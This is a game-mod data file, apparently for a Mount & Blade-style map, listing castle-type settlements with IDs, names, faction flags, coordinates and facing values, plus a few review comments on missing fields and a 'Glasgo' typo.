("baoding", "Baoding", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1031.6, -168.0), [], 215.0),
("zhangbei", "Zhangbei", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1023.64, -196.84), [], 125.0),
("dezhou", "Dezhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1041.76, -150.32), []),
("linqing", "Linqing", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1034.56, -142.92), [], 90.0),
("yantai", "Yantai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1096.84, -149.88), [], 180.0),
("xiangyang", "Xiangyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-994.8, -85.52), [], 190.0),
("wuhan", "Wuhan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1019.26, -68.76), [], 90.0),
("xinye", "Xinye", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-997.44, -92.2), [], 60.0),
("changsha", "Changsha", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1003.76, -43.76), [], 265.0),
("changde", "Changde", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-990.2, -52.32), [], 225.0),
("jingzhou", "Jingzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-995.52, -67.64), [], 155.0),
("chenzhou", "Chenzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1004.72, -16.52), [], 45.0),
("zhangjiajie", "Zhangjiajie", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-976.64, -53.52), [], 180.0),
("yongzhou", "Yongzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-989.68, -23.36), [], 170.0),
("hengyang", "Hengyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-999.92, -29.04), [], 100.0),
("zhongshan", "Zhongshan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1009.24, 18.24), [], 170.0),
("tianmen", "Tianmen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1006.28, -70.76), [], 10.0),
("suizhou", "Suizhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1009.16, -81.84), [], 260.0),
("xianning", "Xianning", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1019.0, -61.68), [], 240.0),
("shaoyang", "Shaoyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-987.68, -33.12), [], 45.0),
("yichang", "Yichang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-985.8, -71.44), [], 90.0),
("yichun", "Yichun", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1020.0, -39.24), [], 180.0),
("tongren", "Tongren", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-962.76, -38.04), [], 315.0),
("chengdu", "Chengdu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-907.2, -69.16), [], 90.0),
("jiangzhou", "Jiangzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-933.96, -58.4), [], 80.0),
("hanzhong", "Hanzhong", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-939.48, -97.44), [], 115.0),
("fengjie", "Fengjie", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-965.64, -74.2), [], 125.0),
("zitong", "Zitong", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-918.68, -82.44), [], 65.0),
("kunming", "Kunming", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-893.32, -7.44), [], 180.0),
("zhushan", "Zhushan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-972.56, -87.88), [], 175.0),
("qujing", "Qujing", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-904.0, -13.64), [], 170.0),
("dazhou", "Dazhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-944.04, -76.84), [], 100.0),
("zhaotong", "Zhaotong", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-902.68, -34.12), [], 120.0),
("wuzhangyuanzhen", "Wuzhangyuanzhen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-946.08, -111.92), [], 130.0),
("yuexi", "Yuexi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-903.8, -52.6), [], 90.0),
("neijiang", "Neijiang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-917.52, -58.44), [], 175.0),
("ankang", "Ankang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-960.68, -94.32), [], 225.0),
("nanchong", "Nanchong", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-929.12, -72.68), [], 275.0),
("guiyang", "Guiyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-935.04, -26.16), [], 45.0),
("tangshan", "Tangshan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1061.4, -177.32), [], 275.0),
("liaoyang", "Liaoyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1116.0, -198.2), [], 90.0),
("beiping", "Beiping", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1041.88, -181.08), [], 155.0),
("chifeng", "Chifeng", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1068.92, -211.32), [], 155.0),
("yingkou", "Yingkou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1105.8, -190.92), [], 170.0),
("chengde", "Chengde", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1059.04, -194.36), [], 170.0),
("qinhuangdao", "Qinhuangdao", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1076.52, -181.72), [], 45.0),
("chaoyang", "Chaoyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1086.2, -202.16), [], 155.0),
("marrakech", "Marrakech", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (316.8, -81.6), [], 90.0),
("fez", "Fez", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (283.6, -109.2), [], 135.0),
("oran", "Oran", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (236.0, -128.0), [], 55.0),
("tangier", "Tangier", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (292.6, -129.08), [], 45.0),
("rabat", "Rabat", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (303.88, -108.48), [], 15.0),
("melia", "Melia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (262.4, -122.0), [], 180.0),
("agadir", "Agadir", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (333.0, -67.56), [], 240.0),
("safi", "Safi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (329.2, -89.64), [], 45.0),
("saidia", "Saidia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (254.28, -118.84), [], 180.0),
("meknes", "Meknes", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (290.44, -107.68), [], 155.0),
("yinchuan", "Yinchuan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-931.2, -163.0), [], 45.0),
("dunhuang", "Dunhuang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-824.0, -186.48), [], 15.0),
("kumul", "Kumul", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-792.0, -218.44), [], 225.0),
("zhangye", "Zhangye", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-867.6, -168.72), [], 45.0),
("shanshan", "Shanshan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-756.4, -219.04), [], 100.0),
("jiuquan", "Jiuquan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-846.2, -178.84), [], 135.0),
("jinchang", "Jinchang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-887.04, -163.52), [], 225.0),
("bayannuur", "Bayannuur", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-943.36, -191.88), [], 90.0),
("runan", "Runan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1019.68, -97.8), [], 90.0),
("jiujiang", "Jiujiang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1039.08, -60.86), [], 45.0),
("shouxian", "Shouxian", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1044.26, -90.84), [], 260.0),
# NOTE(review): omits the trailing facing value that every neighbouring row has
# -- harmless if that field is optional, but verify this omission is intentional.
("lujiang", "Lujiang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1051.2, -77.56), []),
("fuyang", "Fuyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1035.24, -96.36), [], 45.0),
("hefei", "Hefei", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1050.8, -83.44), [], 35.0),
("xinyang", "Xinyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1016.24, -87.52), [], 130.0),
("anqing", "Anqing", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1048.96, -69.56), [], 240.0),
("xian", "Xian", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-960.56, -112.2), [], 170.0),
("lingbao", "Lingbao", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-981.64, -115.08), [], 45.0),
("nanyang", "Nanyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-999.44, -97.32), [], 60.0),
("weinan", "Weinan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-967.62, -115.58), [], 100.0),
("luanchuan", "Luanchuan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-989.64, -106.72), [], 90.0),
("linfen", "Linfen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-988.44, -133.76), [], 90.0),
("almaty", "Almaty", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-610.4, -224.0), [], 80.0),
("taldykrogan", "Taldykrogan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-626.6, -248.0), [], 315.0),
("urumqi", "Urumqi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-728.44, -231.24), [], 260.0),
("bayingol", "Bayingol", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-711.2, -204.52), [], 215.0),
# NOTE(review): missing the optional trailing facing value present on adjacent
# rows -- confirm intentional.
("naringol", "Naringol", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-646.28, -217.92), []),
("usharal", "Usharal", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-654.36, -263.72), [], 275.0),
("changji", "Changji", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-724.24, -234.6), [], 100.0),
("luntai", "Luntai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-694.76, -206.52), [], 100.0),
("kashgar", "Kashgar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-582.97, -176.07), [], 150.0),
("cusco", "Cusco", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1015.28, 374.84), [], 70.0),
("quito", "Quito", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1089.6, 249.24), [], 235.0),
("tiwanaku", "Tiwanaku", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (973.96, 405.56), [], 125.0),
("cajamarca", "Cajamarca", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1086.64, 312.4), [], 45.0),
("lima", "Lima", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1070.84, 360.24), [], 125.0),
("cochabamba", "Cochabamba", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (951.76, 413.96), [], 115.0),
("chimbote", "Chimbote", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1086.68, 330.72), [], 65.0),
("abancay", "Abancay", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1025.68, 376.16), [], 45.0),
("pisco", "Pisco", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1060.8, 376.48), [], 35.0),
("tacna", "Tacna", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (996.52, 419.6), [], 115.0),
("tucuman", "Tucuman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (937.6, 459.6), [], 65.0),
("pasto", "Pasto", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1062.08, 223.24), [], 240.0),
("sucre", "Sucre", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (942.68, 430.32), [], 315.0),
("tenochtitlan", "Tenochtitlan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1307.6, 49.84), [], 85.0),
("teotihuacan", "Teotihuacan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1297.32, -12.4), [], 95.0),
("tikal", "Tikal", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1208.84, 73.12), [], 225.0),
("tegucigalpa", "Tegucigalpa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1182.08, 103.68), [], 115.0),
("tecpan", "Tecpan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1328.2, 72.36), [], 45.0),
("autlan", "Autlan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1369.24, 46.6), [], 15.0),
("texcoco", "Texcoco", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1300.0, 22.0), [], 135.0),
("chalco", "Chalco", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1277.52, 72.16), [], 225.0),
("tlacopan", "Tlacopan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1364.32, 21.36), [], 185.0),
("uxmal", "Uxmal", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1208.28, 34.8), [], 90.0),
("acapulco", "Acapulco", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1320.28, 75.64), [], 45.0),
("tecoman", "Tecoman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1363.88, 55.44), [], 135.0),
("managua", "Managua", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1171.12, 123.36), [], 225.0),
("veliky_novgorod", "Veliky novgorod", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-112.16, -462.8), [], 180.0),
("torzhok", "Torzhok", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-152.64, -434.76), [], 55.0),
("smolensk", "Smolensk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-120.8, -396.4), [], 185.0),
("polatsk", "Polatsk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-85.082, -406.94), [], 270.0),
("moscow", "Moscow", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-181.04, -412.4), [], 345.0),
("minsk", "Minsk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-71.92, -381.96), [], 115.0),
("velikiye_luki", "Velikiye Luki", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-104.16, -423.08), [], 80.0),
("pskov", "Pskov", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-80.0, -449.2), [], 240.0),
("kaluga", "Kaluga", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-166.96, -391.84), [], 180.0),
("ryazan", "Ryazan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-203.92, -393.08), [], 255.0),
("halych", "Halych", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-40.8, -306.24), [], 125.0),
("odesa", "Odesa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-105.8, -269.04), [], 155.0),
("chisinau", "Chisinau", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-85.48, -276.0), [], 45.0),
("galati", "Galati", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-76.68, -253.84), [], 15.0),
("bacau", "Bacau", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-64.52, -269.6), [], 125.0),
# NOTE(review): missing the optional trailing facing value present on adjacent
# rows -- confirm intentional.
("vinnytsia", "Vinnytsia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-81.36, -308.28), []),
("chernivtsi", "Chernivtsi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-53.88, -294.44), [], 240.0),
("lviv", "Lviv", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-32.72, -317.24), [], 105.0),
("granada", "Granada", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (268.84, -147.28), [], 180.0),
("malaga", "Malaga", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (277.68, -141.4), [], 25.0),
("ronda", "Ronda", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (284.0, -146.0), [], 260.0),
("motril", "Motril", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (266.12, -144.52), [], 85.0),
("onondaga", "Onondaga", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1062.0, -217.36), [], 290.0),
("branford", "Branford", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1021.28, -200.52), [], 175.0),
("bufflo_creek", "Bufflo creek", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1174.16, -190.04), [], 255.0),
("grandriver", "Grandriver", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1117.6, -195.76), [], 115.0),
("ottawa", "Ottawa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1056.52, -253.48), [], 225.0),
("milwaukee", "Milwaukee", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1191.56, -220.72), [], 15.0),
("springfield", "Springfield", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1208.8, -178.68), [], 95.0),
("montreal", "Montreal", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1030.56, -255.62), [], 45.0),
("silverspring", "Silverspring", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1075.76, -163.28), [], 275.0),
("quebec", "Quebec", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1008.1, -274.84), [], 315.0),
("chicago", "Chicago", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1186.64, -206.12), [], 180.0),
("mississauga", "Mississauga", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1100.64, -228.84), [], 335.0),
("oshkosh", "Oshkosh", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1196.68, -235.0), [], 225.0),
("aksum", "Aksum", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-199.93, 107.18), [], 25.0),
("gondar", "Gondar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-181.15, 117.21), [], 185.0),
("kassala", "Kassala", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-165.03, 92.78), [], 50.0),
("mek_ele", "Mek'ele", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-204.78, 111.14), [], 270.0),
("dessie", "Dessie", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-216.83, 135.91), [], 270.0),
("lhasa", "Lhasa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-765.6, -58.8), [], 25.0),
("ngari", "Ngari", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-645.2, -91.88), [], 15.0),
("nagqu", "Nagqu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-785.69, -78.82), [], 45.0),
("xigaze", "Xigaze", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-734.78, -58.31), [], 180.0),
("yushu", "Yushu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-839.98, -93.95), [], 120.0),
("skardu", "Skardu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-587.32, -123.49), [], 30.0),
("edinburgh", "Edinburgh", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (265.52, -415.32), [], 45.0),
# NOTE(review): display name "Glasgo" looks like a typo for "Glasgow" -- left
# unchanged here because it is a runtime string; fix deliberately if unintended.
("glasgo", "Glasgo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (276.0, -414.8), [], 90.0),
("inverness", "Inverness", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (275.18, -445.72), [], 65.0),
("aberdeen", "Aberdeen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (253.0, -436.8), [], 270.0),
("kirkwall", "Kirkwall", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (261.14, -471.74), [], 65.0),
("stornoway", "Stornoway", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (298.9, -456.3), [], 180.0),
("dunnegol", "Dunnegol", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (317.64, -393.92), [], 180.0),
("dungenen", "Dungenen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (302.88, -391.36), [], 25.0),
("galway", "Galway", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (328.36, -371.0), [], 25.0),
("cork", "Cork", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (322.08, -348.96), [], 25.0),
("carlow", "Carlow", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (305.04, -363.84), [], 160.0),
("waterford", "Waterford", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (307.36, -354.8), [], 55.0),
("erbing", "Erbing", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (17.2, -385.6), [], 240.0),
